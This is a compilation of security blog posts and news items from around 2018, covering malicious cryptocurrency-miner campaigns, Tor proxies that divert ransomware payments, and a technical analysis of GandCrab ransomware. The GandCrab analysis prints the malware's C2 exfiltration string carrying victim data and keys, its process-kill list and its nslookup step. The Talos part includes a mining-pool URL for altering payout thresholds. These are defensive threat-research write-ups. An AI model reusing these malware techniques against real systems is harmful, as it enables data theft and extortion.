The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.

Active Exploitation


In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain.

When you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining.

Deeper Dive on Mining and Workers


Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
Command Line Syntax

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product Immunet.

Mining as a Payload for the Future


Cryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal.

The sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.

Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it.

Recurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

Continuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive.

Are Miners Malware?


Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network.

If a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors.

Enterprise Impacts


Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

Due to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such.

Fails we Found


While investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:
Command Line Syntax

Interestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves.
Source Code Default Values

In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below:
Mining Fail Example #1
Mining Fail Example #2
Mining Fail Example #3
Mining Fail Example #4

This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure:

"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

Where $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary.

Conclusion


The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward.

Coverage


There are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

IOC Section


IP Addresses:


89.248.169[.]136
128.199.86[.]57

Domains:


qyvtls749tio[.]com
youronionlink[.]onion

File Hashes


Improve collaboration to overcome cyber-attack security issues, say transportation security leaders

One of the keys to averting cyber-attacks on critical US transportation infrastructure, such as 2016’s ransomware attack on San Francisco’s transit network, lies in industry-wide collaboration, according to security experts

The post Improve collaboration to overcome cyber-attack security issues, say transportation security leaders appeared first on The Cyber Security Place.

Crypto-Mining: The Next Ransomware

Hackers are opportunistic by nature. As device manufacturers continue to add more CPU cores and gigabytes of RAM to smartphones and tablets as well as enterprise-grade cloud servers, these devices

The post Crypto-Mining: The Next Ransomware appeared first on The Cyber Security Place.

Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded

What do you get when you add Bitcoin, with a TOR network proxy and cybercriminals? Even more cybercrime!

Bitcoin is the preferred cryptocurrency for ransomware payments. Like most cryptocurrencies it is largely anonymous, allowing the ransoming cybercriminals to collect their money while staying safely in the shadows. Even though Bitcoin is the most popular cryptocurrency, the majority of victims do not have a ready cache of Bitcoin to pay ransom with so the cybercriminals came up with a process to facilitate these ransom payments.

Payment websites are hosted on the Tor network where victims login, purchase Bitcoin and deposit them into the wallet of the bad actors. Sounds convenient, unless there is another bad actor in the middle. To understand how that happens, we first need to explain the Tor network.

Tor is an acronym based on a software project called The Onion Router. It “[redirects] Internet traffic through a free, worldwide, volunteer overlay network consisting of more than seven thousand relays to conceal a user’s location and usage…“, Tor (anonymity network), Wikipedia. In other words, you must use a Tor client to connect to the Tor network and in doing so, you participate as a relay in the network helping to provide anonymity for all other users.

There are many situations where this type of Internet anonymity would be useful: researching a company without alerting them to who is looking, researching a controversial topic without being identified, avoiding oppressive government restrictions or spying, and facilitating Bitcoin payments while hiding the location of the web server. The challenge for the ransomers is that victims are even less likely to be set up with a Tor client than they are to have Bitcoin! To solve this problem, there are individuals who run “Tor proxies.” These proxies are accessible with a regular browser on the Internet so no special software is required. For example, the hidden server on the Tor network might be addressed by hxxps://sketchwebsite.onion which requires a Tor browser to connect. However by entering hxxps://sketchwebsite.onion.to into a regular browser, a connection is made with a “regular server” on the Internet which redirects (proxies) the request to sketchwebsite.onion on your behalf. You can surf the Tor network, and make your Bitcoin payments with no special software required. By design, a proxy takes a connection from one party and passes it to another. This involves looking at the incoming request to understand where it needs to be forwarded. This also creates an opportunity for the proxy to make changes in between.

Proofpoint is the security vendor that identified cybercriminals taking advantage of Tor proxies to steal from victims and the ransoming cybercriminals. They discovered that when victims attempted to connect to the ransomers’ website through a Tor proxy, the criminals operating the proxy made changes to the stream. Instead of the Bitcoin being deposited to the intended ransomer’s digital wallets, the funds were redirected to the proxy operator’s wallet. While you won’t be sympathetic to the ransoming cybercriminals’ loss of revenue, the real problem is that without payment they won’t release the decryption key to the victim. The ransomware victim thought they were paying Bitcoin to the ransomer for the decryption key, but with the man-in-the-middle attack at the Tor proxy they paid for nothing.

Through some very detailed analysis documented here, Proofpoint estimates that approximately 2 BTC have been redirected (around $20,000 at the time they published their article.) It was a notice on the LockeR ransomware payment portal that alerted Proofpoint researchers that something was amiss in the cybercrime underworld:

bitcoin ransomware

“While this is not necessarily a bad thing, it does raise an interesting business problem for ransomware threat actors and practical issues for ransomware victims by further increasing the risk to victims who would resort to paying ransomware ransoms,” Proofpoint researchers said. “This kind of scheme also reflects the broader trend of threat actors of all stripes targeting cryptocurrency theft. Continued volatility in cryptocurrency markets and increasing interest in the Tor network will likely drive further potential abuses of Tor proxies, creating additional risks for new users.”

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alberta Chapter.
 

Pierluigi Paganini

(Security Affairs – Bitcoin, cybercrime)

The post Cybercriminals Stealing From Cybercriminals Ransomware Victims Left Stranded appeared first on Security Affairs.

Bitcoin hijack steals from both ransomware authors AND their victims

Talk about having a bad day…

First you get hit with ransomware, demanding you send a Bitcoin payment to anonymous hackers

Then you realise that you don’t have a secure backup of your files, so you’ll have to pay up to have any hope of getting your files back.

And finally, after you have worked out how to buy yourself some Bitcoins online, and as you are attempting to pay the hackers their ransom… the payment gets diverted to someone else entirely.

In short, your files are still encrypted, and you’ve lost all your money.

That’s the ultimate bad-day scenario being described by security researchers who claim to have identified a scam that both steals from ransomware authors and their victims.

Here’s the background.

It’s not at all unusual for ransomware to present victims with a demand that the ransom be paid via a Tor .onion site on the dark web. Of course, the typical victim of ransomware has probably never been on the dark web, and probably doesn’t have the first clue about how to install the Tor browser.

As a result, they might use a Tor proxy instead. Tor proxy services act as a man-in-the-middle, allowing anybody to simply enter a .onion address into a website – or add a suffix to the URL such as “.to” or “.top” – to have their request completed, with no need to install special software.

Of course, you are putting an enormous amount of trust in the hands of the Tor proxy service that they are not meddling with the information you are seeing – or indeed the data that you are sending.

Fascinatingly, security researchers say that they have uncovered evidence that at least one Tor proxy is interfering with ransomware payments, effectively stealing from the ransomware’s authors and victims alike. According to Proofpoint, ransomware payment webpages are being the secretly altered when viewed via the Onion.top Tor-to-web proxy in order to display a different Bitcoin address.

Ransomware such as Sigma, GlobeImposter, and LockeR have all been identified as suffering from a sneaky switcheroo of Bitcoin wallet addresses via the proxy, giving a different payment address than when the same page is viewed via the real Tor browser.

Perhaps it’s no surprise then that some ransomware is actually warning its victims not to use Onion.top.

As always, the best way to avoid the effects of ransomware is not to have your computer or smartphone infected in the first place. Be sure to follow Hot for Security’s tips for reducing the ransomware threat before you become the next victim.

The Top Malware Families in Banking, Mobile, Ransomware, and Crypto-Mining of 2017

The second half of 2017 was busy in terms of digital security events. In September, consumer reporting agency Equifax announced a breach that potentially compromised the Social Security Numbers and other personal information of 143 million U.S. consumers. Less than two months later, organizations in Russia and Ukraine suffered infections at the hands of BadRabbit, […]… Read More

The post The Top Malware Families in Banking, Mobile, Ransomware, and Crypto-Mining of 2017 appeared first on The State of Security.

GandCrab ransomware distributed by RIG and GrandSoft exploit kits

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.

Distribution

GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified itself as of late with distinct threads pushing a specific payload. While Seamless is notorious for having switched to International Domain Names (IDNs) containing characters from the Russian alphabet, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and thought to have disappeared. Yet it was discovered that it too was used to redistribute GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab is not demanding payment in the popular Bitcoin currency, but rather a lesser-known cryptocurrency called Dash. this is another sign that threat actors are going for currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is pretty straight forward as far as analysis is concerned. There were no attempts to obfuscate data or code beyond just the first layer of the packer. Everything from the exclusion file types to web request variables, URLs, list of AVs—even the whole ransom message—is in plain text within the data section. On initial look-through, you can deduce what some of the functionality might be just by simply looking at the strings of the binary.

The code flow stays relatively inline, so as far as reverse engineering is concerned, it allows you to quite accurately analyze it even just statically in a disassembler. The code is divided up into three main segments: initialization, network, and encryption.

Initialization

After unpacking, GranCrab starts out with a few functions whose tasks are to set up some information to be used later in the code. It queries information about the user such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet querying if a drive exists and what type it is. If it is a CDRom, unknown, or non existent, it skips it. If a fixed drive is found, it copies its name to a buffer and copies a string describing what type of drive it is. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:

ip=99.8.160.100&pc_user=virusLab&pc_name=VI

It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:

Global\pc_group=WORKGROUP&ransom_id=c9ed65de824663f

In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

KEY PROCESS LIST:
msftesql.exe                        sqlagent.exe                           sqlbrowser.exe
sqlservr.exe                         sqlwriter.exe                         oracle.exe
ocssd.exe                             dbsnmp.exe                            synctime.exe
mydesktopqos.exe           agntsvc.exe                             isqlplussvc.exe
xfssvccon.exe                     mydesktopservice.exe       ocautoupds.exe
agntsvc.exe                         agntsvc.exe                             agntsvc.exe
encsvc.exe                          firefoxconfig.exe                  tbirdconfig.exe
ocomm.exe                        mysqld.exe                              mysqld-nt.exe
mysqld-opt.exe                 dbeng50.exe                          sqbcoreservice.exe
excel.exe                              infopath.exe                           msaccess.exe
mspub.exe                          onenote.exe                            outlook.exe
powerpnt.exe                    steam.exe                                 thebat.exe
thebat64.exe                      thunderbird.exe                    visio.exe
winword.exe                       wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side and uses the standard Microsoft crypto libraries available using API calls from Advapi32.dll. It calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off by making a GET request to ipv4bot.whatismyipaddress.com that saves the IP address returned and adds to the GET request string, which has been built with the system information.

It continues and takes a binary chunk, which is the RSA public key that was stored earlier in the initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:

CRYPT_STRING_NOCRLF  and CRYPT_STRING_BASE64

It will be tacked on the the existent GET string, which it has been building this whole time. Below is an example of the RSA key generated in binary and its conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:
A7 EC BD E2 49 43 E1 11 DA 12 10 E0 25 59 AA 83 77 35 FC 3E 49 C8 3B 6C 3D 91 CF FF 96 6E D8 45 FE 8A 58 20 E6 CB 91 AB 99 6A E2 04 EC 58 66 95 05 8C 2F 7E C6 19 6D 24 B5 5F C4 9A 01 3D 3B FB 31 4E AC 25 07 8C 0E 6C 57 4C C0 23 24 3A EB 57 97 17 79 F8 62 73 6B AD B2 09 60 BB B7 9A CF F9 5B 68 B8 C1 44 07 F5 5E 3E 06 FE C2 35 CF 99 82 29 28 37 1B E6 51 29 6C 0B 87 89 F9 90 26 F7 CC DA 75 C4 46 A1 E3 30 09 C0 6A CB 5E CB 87 8E 40 EF 4C 7E 02 AE E8 06 6A D7 24 FC 0E 40 EA 69 CD 6D 8D 24 92 6E 53 2F D2 69 D2 A2 F3 97 54 63 EB D9 C7 BD 9E 41 19 91 F1 6B D6 CA AD 9E 0E D3 0B A0 53 50 84 87 6D 49 4C 49 D2 3B 8E 80 F7 7F 35 F1 D7 A7 81 0F 90 04 40 AC 4B 7C ED 37 71 8A B1 FA 84 33 33 FB 62 EE 04 A3 C7 9A 47 2C 64 64 95 3D 34 A5 CC 12 6E E4 81 40 E6 7F 03 02 C4 57 D6

Which gets converted to:

BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW

And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

action=call&ip=99.8.160.100&pc_user=virusLab&pc_name=VIRUSLAB-PC&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
 &priv_key=BwIAAACkAABSU0EyAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfWGRZmQmHH5W5K1RYgSg8VJEFLebRW8+o7X0K30wzzrw5NHpJpVJYX8OKot8KvopS4wsZzuxu5YJih1ZYVgF6QT5FW4WEG3BzMtq5vGVqTmrlckudC0xfGlGb7J41vUkZsp6S07NTIIT7HtYJSA/pxS51Zg+13TfU0nxC92RkKuva/8Dzmgssm6uE7aYJQFEkUmkPImYreHGIPsffEEGtZM9zwz4tXbrXLch0BoRNHeR+GFLJclnLc5JMg/J4BLaS6js+RGxRbZGMPJDVX6lTEEl+aIYO38Wh49+Zcpzs4EOUfb1EsoLEDAZbppIWq8Yr1P6KtWkqIXRzjUk9HXiJm3qHm0u0vchV4iRAKz2MJ/xZdYjHp+C3qMTTsNbQbtcscpy13/rEv8oO6clfciSCPcthy5IkLFLKZQP5be+IcsAjxeSoOqqtEpNpj8nOKfZ5PvEs+/kn718vG0R5CMU4I0fyF0BD68AFat6dl5gHK1sKs0ndAvCKdDMg/HqO/JKUZRSza2VKkgxpXC57BRGNP0r/jYySGnqhE2owHQaXoEmP9tme1A8PHsAoNtUEd0SO4/pn4hDg70o/Nmph/UWqtOq9nSlrxQMD8Q08w4K2H1CC3eCAnHZOM8PTCDYH3nh6f/ftkVtyrpudTpicTjoUSEkwtEPRsWk7ff3F/Na8D2FcXSI5xQ6R+R2uy8GvVoxpBy8Xdh78VqViOBlu5+Jxp09PMQmI2EFususg4VJeH047Wayi2r+VemzAX1rTuMh2mRKfKa+eae+YBKjBUkIh9WPCmFjO+3lll7GqV7P4JFm1g2sjrm/dPWnoGzfg1E7brER6aD2q+w1+4o8wCzNTNvPH2bwPMyV6R+vbWOVZUTprzZ4sRr7KxT0ucZmNA76WX39NegSU56tOngYpAQprOMrJP0NYmrizT8FsCOcqlUGk0jf6moarJSWQxh2MxXtlpFAvJjPTqqKruIVMhIkTJ9aZHKnn02a5PIdLcs4a09D85js9klKZn90Gj6C4AxlT2nI/ba9mEx+7srvxxbh1XNgI987IWLsLYpWxHlRptJqIvI0ZAA3EuvwZuZ8f6sqLM2/rSxdOnFW5hd8am9zgopimktfkjFtsHpev/Svf0VlxQ3Fj22A06aXqfi7hmWPZ8ZCtZ874PUHgbrG3foNESQiTghT2NLV9rNNad7ij/kVA=
 &version=1.0
[Crypto key base 64 functions]
[Section of code that is adding the encoded keys to the get string under priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain]  a.dnspod.com.

This command queries the a.dnspod.com name server, which support the .bit TLD for one of the domains below.

bleepingcomputer.bit
nomoreransom.bit
esetnod32.bit
emsisoft.bit
gandcrab.bit

The NSlookup child process is opened through a pipe that was created. This is done so that a child process can directly affect the memory in the parent process, rather than transferring outputs manually back and forth. It is an interesting and useful technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:

Once it finds one of these, it continues to open a thread that will start the main encryption functionality. However, before it begins, it opens another thread that creates a window and labels itself as Firefox.The window is loaded with code that will copy itself to the temp directory and set itself up in the registry. This is actually one of the few parts of the malware that is not taken directly from plain text. The file name copy of itself is a random series of letters generated by calling the cryptGenRandom function, and using its output on an array of letters.

The strange part about this function is not what it does, because it is creating persistence that we had been waiting for, but rather why a window was created in the first place. As far as we could understand, there is no benefit of launching a window to perform these tasks. Maybe it was experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we have established from the initialization section of the malware, the encryption algorithm used is RSA. Before we get the encryption section, the code makes sure that it is not encrypting specific types of files that it considers protected. The files are the following, hard coded into the malware:

desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat
thumbs.db
GDCB-DECRYPT.txt
.sql

If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

local app data
windows
programfiles
program data
ransomware
localsettings

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys along with some salt and random number generated to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually make it to every file on the drive.

Protection

Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:

Conclusion

It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate

31.31.196.187,xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

62.109.4.135

GandCrab (packed)

69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d

GandCrab (unpacked)

ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51

The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.

How to prepare for the future of digital extortion

Digital extortion has evolved into the most successful criminal business model in the current threat landscape, and Trend Micro researchers predict that it will continue to grow rampant because it’s cheap, easy to commit, and many times the victims pay. Attackers can go after a wide variety of targets The line between blackmail and extortion is blurred in the digital realm. “Many digital crimes we normally think of as blackmail are, in fact, extortion — … More

Dridex gang follows trends, also created FriedEx ransomware

The gang behind the infamous banking Trojan Dridex has also created the FriedEx (aka BitPaymer) ransomware, ESET researchers confidently claim. The similarities between Dridex and FriedEx By analyzing and comparing the code of both threats, the researchers discovered a handful of similarities: Both malware use the same function for generating UserID (i.e., that generates a unique string from several attributes of the victim’s machine) Most of the other functions that correspond to the specific malware … More

Cybersecurity Incidents Doubled in 2017, Study Finds

2017 was another record year for cybercrime. According to the Online Trust Alliance (OTA), the number of cybersecurity incidents nearly doubled from the previous year. This led Jeff Wilbur, director of the OTA initiative at the Internet Society, to call it the “worst year ever in data breaches.”

The group’s “Cyber Incident & Breach Trends Report” attributed this massive surge — from about 82,000 incidents in 2016 to an estimated 160,000 in 2017 — to the unprecedented rise of ransomware, which accounted for 134,000 attacks. Even worse, the report noted that the total number of attacks could actually be as high as 350,000, since many breaches go unreported.

Another Record Year for Cybersecurity Incidents

The rise in incidents is due in large part to several novel attacks methods that emerged or ramped up in the past year. The FBI estimated that business email compromise (BEC), for example, cost companies around the world $5.3 billion, as cited in the report. Ransom denial-of-service (RDoS) activity, in which fraudsters threaten to direct overwhelming amounts of traffic to target websites unless domain owners pay a ransom, also spiked in 2017.

Of course, high-profile ransomware attacks such as WannaCry and NotPetya also contributed to 2017’s eye-popping cybercrime statistics. The former, which the OTA called “one of the most widespread and devastating attacks in history,” infected 300,000 computers across 150 countries, halting operations at organizations around the world. The latter similarly affected hundreds of thousands of endpoints in more than 100 countries.

